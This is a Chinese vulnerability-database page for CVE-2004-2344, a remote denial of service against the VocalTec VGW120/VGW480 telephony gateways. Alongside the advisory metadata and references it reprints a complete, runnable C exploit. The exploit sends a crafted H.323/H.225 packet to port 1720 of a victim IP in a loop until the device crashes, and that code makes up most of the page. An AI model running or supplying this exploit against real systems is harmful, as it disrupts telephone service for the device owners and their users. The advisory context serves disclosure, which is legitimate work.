VocalTec VGW120/ VGW480 Telephony Gateway远程H.225拒绝服务漏洞-安全小百科

VocalTec VGW120/ VGW480 Telephony Gateway远程H.225拒绝服务漏洞

漏洞ID	1107966	漏洞类型	其他
发布时间	2004-05-24	更新时间	2005-10-20
CVE编号	CVE-2004-2344	CNNVD-ID	CNNVD-200412-535
漏洞平台	Hardware	CVSS评分	5.0

|漏洞来源

https://www.exploit-db.com/exploits/24143
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-535

|漏洞详情

VocalTecVGW120/VGW480是电话网关系统。VocalTecVGW120/VGW480电话网关在处理部分H.323通信时存在问题，远程攻击者可以利用这个漏洞对设备进行拒绝服务攻击。提交特殊构建的H.323通信给VocalTecVGW120/VGW480电话网关，会由于ASN.1/H.323/H.225堆栈发生问题而产生拒绝服务。

|漏洞EXP

source: http://www.securityfocus.com/bid/10411/info

It has been reported that the VocalTec VGW120 and VGW480 Telephony Gateways are prone to a remote denial of service vulnerability. The issue is reported to exist in the ASN.1/H.323/H.225 stack.

A remote attacker may exploit this issue to deny service to the affected appliances. 

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <fcntl.h>
#include <netdb.h>
#include <unistd.h>
#include <errno.h>

#define H323_SIGNAL_PORT 1720

unsigned char kill_buff[] = {
0x03, 0x00, 0x01, 0x57, 0x08, 0x02, 0x00, 0x04, 0x05, 0x04, 0x03, 0x80, 0x90, 0xa5, 0x6c, 0x0b,
0x81, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x70, 0x0c, 0x81, 0x31, 0x32,
0x33, 0x34, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x7e, 0x01, 0x2b, 0x05, 0x20, 0x80, 0x06,
0x00, 0x08, 0x91, 0x4a, 0x00, 0x04, 0x28, 0x00, 0xb5, 0x00, 0x00, 0x12, 0x40, 0x01, 0x3c, 0x05,
0x01, 0x00, 0x00, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x61, 0x62, 0x63, 0x64, 0x65,
0x66, 0x67, 0x68, 0x00, 0x8d, 0x1d, 0x82, 0x07, 0x00, 0xac, 0x10, 0x01, 0x01, 0x02, 0x9a, 0x11,
0x00, 0x62, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67,
0x68, 0x32, 0x02, 0x12, 0x00, 0x00, 0x00, 0x0d, 0x40, 0x01, 0x80, 0x0a, 0x04, 0x00, 0x01, 0x00,
0xac, 0x10, 0x01, 0x01, 0x47, 0xf1, 0x1d, 0x40, 0x00, 0x00, 0x06, 0x04, 0x01, 0x00, 0x4d, 0x40,
0x01, 0x80, 0x11, 0x14, 0x00, 0x01, 0x00, 0xac, 0x10, 0x01, 0x01, 0x47, 0xf0, 0x00, 0xac, 0x10,
0x01, 0x01, 0x47, 0xf1, 0x01, 0x00, 0x01, 0x00, 0x01, 0x80, 0x01, 0x80, 0x00, 0x0a, 0xa8, 0x01,
0x80, 0x6f, 0x01, 0x40, 0xb5, 0x00, 0x00, 0x12, 0x68, 0xe0, 0x01, 0x01, 0x00, 0x01, 0x1c, 0x58,
0x1c, 0x39, 0x9e, 0x01, 0x00, 0x03, 0x67, 0x74, 0x64, 0x00, 0x00, 0x00, 0x2e, 0x49, 0x41, 0x4d,
0x2c, 0x0d, 0x0a, 0x47, 0x43, 0x49, 0x2c, 0x33, 0x39, 0x61, 0x65, 0x65, 0x31, 0x35, 0x65, 0x62,
0x66, 0x31, 0x38, 0x31, 0x31, 0x64, 0x33, 0x38, 0x30, 0x30, 0x62, 0x64, 0x39, 0x63, 0x39, 0x65,
0x62, 0x30, 0x62, 0x31, 0x33, 0x35, 0x65, 0x0d, 0x0a, 0x0d, 0x0a, 0xa1, 0x04, 0x03, 0x90, 0x90,
0xa3, 0x18, 0x03, 0xa1, 0x83, 0x9f, 0x1e, 0x02, 0x81, 0x83, 0x70, 0x0c, 0x81, 0x37, 0x30, 0x39,
0x35, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x04, 0x80, 0x06, 0x00, 0x04, 0x00, 0x00, 0x00,
0x03, 0x35, 0x02, 0x04, 0x67, 0x74, 0x64, 0x01, 0x2e, 0x49, 0x41, 0x4d, 0x2c, 0x0d, 0x0a, 0x47,
0x43, 0x49, 0x2c, 0x33, 0x39, 0x61, 0x65, 0x65, 0x31, 0x35, 0x65, 0x62, 0x66, 0x31, 0x38, 0x31,
0x31, 0x64, 0x33, 0x38, 0x30, 0x30, 0x62, 0x64, 0x39, 0x63, 0x39, 0x65, 0x62, 0x30, 0x62, 0x31,
0x33, 0x35, 0x65, 0x0d, 0x0a, 0x0d, 0x0a};

int nuke_victim(char * ip)
{
 int sock;
 struct sockaddr_in vict_addr;
 
 if ((sock=socket(AF_INET, SOCK_STREAM, 0))==-1)
  {
  perror("nuke_victim()::socket()");
  return -1;
  }
 memset(&vict_addr, 0, sizeof(vict_addr));
 vict_addr.sin_family=AF_INET;
 inet_pton(AF_INET, ip, &vict_addr.sin_addr);
 vict_addr.sin_port=htons(H323_SIGNAL_PORT);
 if (connect(sock, (struct sockaddr *) &vict_addr, sizeof(vict_addr))==-1)
  {
  close(sock);
  if (errno==ECONNREFUSED) return 1;
  perror("nuke_victim()::connect()");
  return -1;
  }
 if (send(sock,kill_buff,sizeof(kill_buff),MSG_NOSIGNAL)!=sizeof(kill_buff))
  {
  close(sock);
  if (errno==EPIPE) return 1;
  perror("nuke_victim()::send()");
  return -1;
  }
 close(sock);
 return 0;
}

int main(int argc, char ** argv)
{
 int ret_flag=0;
 int try_count=0;
 if (argc<2)
  {
  fprintf(stderr, "Usage: %s <victim IP>n", argv[0]);
  return 1;
  }
 while((ret_flag=nuke_victim(argv[1]))==0) 
  {
  try_count++;
  usleep(100000);
  }
 if (ret_flag==-1) printf("Execution aborted with internal errorn");
 if (ret_flag==1) printf("Victim %s successfully nuked with %d tryesn", argv[1], try_count);
 return 0;
}

|参考资料

来源:XF
名称:vocaltec-gateway-dos(16240)
链接:http://xforce.iss.net/xforce/xfdb/16240
来源:www.securitylab.ru
链接:http://www.securitylab.ru/45401.html
来源:BID
名称:10411
链接:http://www.securityfocus.com/bid/10411
来源：NSFOCUS
名称：6486
链接：http://www.nsfocus.net/vulndb/6486

相关推荐: CodeThat.com CodeThatShoppingCart Multiple Input Validation Vulnerabilities

CodeThat.com CodeThatShoppingCart Multiple Input Validation Vulnerabilities 漏洞ID 1096709 漏洞类型 Input Validation Error 发布时间 2005-05-…

文章版权归作者所有，未经允许请勿转载。

THE END